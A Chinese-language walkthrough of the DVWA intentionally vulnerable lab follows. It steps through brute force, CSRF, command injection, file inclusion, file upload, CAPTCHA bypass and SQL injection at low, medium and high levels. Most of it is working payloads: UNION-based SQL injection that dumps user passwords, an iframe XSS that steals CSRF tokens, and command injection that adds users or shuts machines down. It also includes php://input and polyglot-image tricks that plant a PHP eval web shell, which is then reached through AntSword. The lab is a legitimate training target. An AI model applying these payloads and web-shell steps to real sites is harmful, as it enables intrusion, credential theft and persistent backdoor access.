DVWA通关 （上半部分）

DVWA的通关

burp   有四种模式 单个的，攻城锤的这两个都是一个payload 鱼叉和炸弹两个payload    鱼叉用在高级 ，低级和中级都用炸弹

暴力破解

low
'admin ' or '1'='1  根据代码去找漏洞    SELECT * FROM `users` WHERE user = '$user' AND password = ''
                                                                        SELECT * FROM `users` WHERE user = 'admin ' or '1'='1 password =''

中级
低级跟中级都可以用那个burp去破解的 低级的用那个cluster bomb（炸弹）去破解但是记得将账号密码都设置为payload其次可以用用两个字典（账号密码）破解，最后值最低的就是
账号密码
中级的有试错时间限制得将时间内的破解次数增加点resource pool 去设置次数否则太慢了 其他的操作一样，也是最小的密码

高级的有一个token限制 操作的话选择鱼叉  但是有三个payload 账号密码跟token但是选择密码跟token，可以用账号的字典在之前去炸开初始账号，在设置选grep extract 点增加点frtch respone 往下拉再点那个redirections 选择那个always回去刚刚在grep extract会出现一个OK 复制那个token的值点ok ，回去那个payload界面那个第二个选那个recuisive grep 将复制的token值复制到下面的框里面，去resource pool设置时间为1。

CRSF

low   crsf/后面加上?password_new=password&password_conf=password&Change=Change#
中级     先去访问一次那个网站然后开抓包看看得到的是不是那个包不是的话再换在改重新抓包，直到那个Referer: http://dvwa-master/vulnerabilities/csrf/?password_new=1111&password_conf=1111&Change=Change有这个referer 然后复制这个referer重新打开一个页面访问这个url然后在新的页面重新抓包不用输入密码
将referer弄到那个新的那个页面去并改变密码
高级  先去xss存储的那个界面抓包然后再那个name的改一下变成 <iframe src="../csrf/"οnlοad=alert(frames[0].document.getElementsByName('user_token')[0].value)>在放包在界面会有那个token复制然后去抓那个高级的crsf的包就去改一下那个高级的包中的token值就可以了

命令

可以去微软找cmd命令           前面一个ip后面一个&加上其他得到命令          
whoai  看当前用户名
ipconfig 查看网卡信息
shutdown -s -t 0  关机
net user [username] [password] /add 增加一个用户名为username密码为password的用户
type[file_name] 查看filename文件内容
dir 看内容
|  ; & 都会执行
||前面失败才执行后面
&& 前面成功执行后面
命令执行漏洞 用dvwa测试        127.0.0.1&whoami  127.0.0.1&shutdown   127.0.0.1&ipconfig   等等
中级 符号过不了  && ；这些不行
高级只有那个|这个单独一个能过因为里面代码有一个|加空格   

                      
文件包含

low
可以通过伪协议去跳转ip去访问我们的木马
在最上面的那个url在http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=  后面放上2我们要改的东西  +/etc/passwd 一些信息
 http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=加http://域名（www.baidu.com）可以跳转页面
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=加php://input  去burp抓包在抓包页面最下面加上<?php phpinfo(); ?>  然后将包forward
 得到我们要的（在burp抓包下面也可以放那个我们自己的木马代码）+在刚刚那个包下面重新刷新一次<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>
在上面的url  在最上面的那个url在http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=shell.php 看看会不会报错
                                                           http://127.0.0.1/DVWA-master/vulnerabilities/fi/shell.php 测试报错
然后用中国蚁剑去连接 地址为  http://127.0.0.1/DVWA-master/vulnerabilities/fi/shell.php 密码为cmd

中
操作一样跟低级

high  
已经不能跟普通的一样了因为限制了前缀file:得利用low的文件上传先传一个1.JPG的照片上去但是里面是用文本写的前端代码
HI                  
<?php
echo "xx";   前面三行是显示成功的提示数字
fputs(fopen('shell9.php','w'),'<?php @eval($_POST[cmd])?>');?>   我们文件上传的木马

>

在用那个URL访问看看成功了没有
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=file:///D:/phpstudy_pro/WWW/DVWA-master/hackable/uploads/1.jpg（后面这个是上传的地方路径）
成功就会有这个前面的提示  xxx
然后就上传成功了能看见内容  
后面操作跟low一样
http://127.0.0.1/DVWA-master/vulnerabilities/fi/shell.php 地址密码

文件上传

low
跟高级的操作差不多  上传一个东西成功后用这个http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=file:///D:/phpstudy_pro/WWW/DVWA-master/hackable/uploads/1.jpg 成功了在用蚁剑
http://127.0.0.1/DVWA-master/vulnerabilities/fi/shell.php 可以连接上
中级
先观察代码将image/png复制下来然后将文件上传抓这个上传的包  将包的连接-type给替换成image/png  forward得到那个界面显示上传成功 ，就可以用之前的方法了，
用蚁剑 登入
高级（高级的文件有要求所以要用kali去合成图片和木马文件成一个png   jpeg 的格式）
跟那个文件包含的高级一样先传东西上去数据库里面然后在查看http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=file:///D:/phpstudy_pro/WWW/DVWA-master/hackable/uploads/1.jpg   可以了http://127.0.0.1/DVWA-master/vulnerabilities/fi/shell.php    测试一下这个也是那个地址IP

Insecure CAPTCHA  （有点像验证一样）

low
step=1&password_new=12&password_conf=12&Change=Change  改成
step=2&password_new=12&password_conf=12&Change=Change

中级
在界面改密码然后在最后一句改step=1&password_new=13&password_conf=13&Change
改step=2&password_new=13&password_conf=13&Change=Change&passed_captcha=true然后forward
high
将抓到的包变成中的两个改成下面这个然后
User-Agent:reCAPTCHA  （这个在代码要求里面有这两个）
step=1&password_new=12&password_conf=12&user_token=8eeddd65768c81da386d8fcdab9a0175&Change=Change&g-recaptcha-response=hidd3n_valu3
 然后发送一下repeater 在发送一次

sql注入

low
sql一种数据库语言，可以调用数据库，利用输入框的查询功能去验证sql的语句，有用说明有漏洞 1'and 1=1#  1'and 1=2#(判断SQL注入漏洞)#删除后面的SQL语句执行
查询列数 1' order by 1 #    1' order by 2#   1' order by 3# 看一共有几列                    1' or 1=1#
1' union select user(), database()# 得到数据库的连接用户和当前数据库的名称
  得到数据库里面有几个文件名称
1'union select 1,group_concat(table_name)    COLLATE utf8_general_ci from information_schema.tables where table_schema=database()# 得到数据库里面有几个文件名称
1'union select user,password from users#   从上面得到的数据库文件信息去访问里面文件的内容
手工注入

中级
用burp抓包找到id=1&Submit=Submit  在1后面插入sql注入的语句可以减少   规则一样
or 1=1     and 1=1  and 1=2
union select user(), database()
union select 1,group_concat(table_name)    COLLATE utf8_general_ci from information_schema.tables where table_schema=database()

high 跟low一样
1'and 1=1#  1'and 1=2#
1' order by 1 #
1' union select user(), database()#
1'union select 1,group_concat(table_name)    COLLATE utf8_general_ci from information_schema.tables where table_schema=database()# 
1'union select user,password from users#   
 

下次分享那个手工注入的要点跟代码